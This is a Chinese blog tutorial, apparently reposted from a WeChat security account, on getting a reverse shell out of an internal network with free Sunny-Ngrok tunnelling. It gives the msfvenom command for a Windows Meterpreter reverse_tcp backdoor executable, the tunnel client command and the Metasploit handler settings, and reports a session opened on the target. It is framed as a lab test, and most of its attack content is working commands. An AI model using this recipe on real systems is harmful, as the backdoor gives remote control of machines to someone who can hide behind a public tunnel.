白嫖Ngrok反弹内网shell

  • A+
所属分类:安全文章

文章前言

       在后渗透阶段,权限维持也是很有意思的一个话题。其中有一个适合想我这样的穷人家的孩子利用的方法,我的宗旨是“生命不息白嫖不止”。那么我们来利用内网穿透做一次试验《白嫖之反弹shell》。

 

试验环境:

Windowsserver 2008 R2Kali20.1

使用工具:       

MsfSunny-Ngrok(工具很多这个仅供参考)

涉及资源:    

https://www.ngrok.cc/

 

原理:

         Msf生成exe后门文件,利用Sunny-Ngrok的免费内网转发,来将我们的后门反弹到本地的机子上(这里反弹到kali上)。然后本地设置监听完成一次内网穿透。

 一、注册并下载Sunny-Ngrok

相信大家都能够注册这些,我比较懒就不说明了。

注册完之后 我们去开通隧道

白嫖Ngrok反弹内网shell白嫖Ngrok反弹内网shell


开通完之后我们就有一个免费的公网IP(●ˇ∀ˇ●)嘿嘿

白嫖Ngrok反弹内网shell

接下来下载客户端了我这里下载了 linux的版本 PS:因为这里我们是要将信息转发到内网的kali

二、生成后门

命令如下:

[email protected]:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=你开通隧道时设定的端口-f exe -o name.exe

白嫖Ngrok反弹内网shell

三、开启监听

首先打开我们的内网转发工具

本身我已经把工具放到了kali 我们进入工具目录

命令如下:

./sunny clientid 隧道id

白嫖Ngrok反弹内网shell

现在打开我们的内网转发工具

白嫖Ngrok反弹内网shell白嫖Ngrok反弹内网shell

接下来我们就该开启监听了

命令如下:

msf监听:use exploit/multi/handlerset payload windows/meterpreter/reverset_tcpset lhost 127.0.0.1set lport 8000run

所需要的配置需求如下图:

白嫖Ngrok反弹内网shell

开启我们的监听

白嫖Ngrok反弹内网shell

这样我们就完成了前期准备工作了。

接下来就是试验的最终目的了

 

四、试验结果

由于我事先把后门放到了靶机上了 我们来运行它

白嫖Ngrok反弹内网shell

返回到kali 已经得到了一个会话

白嫖Ngrok反弹内网shell

白嫖Ngrok反弹内网shell

成功完成一次白嫖内网转发反弹Shell


ps:虽然做法简单,但是希望能帮助到看诸位看官们。有些截图挺模糊的深感抱歉!


本文始发于微信公众号(NOVASEC):白嫖Ngrok反弹内网shell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: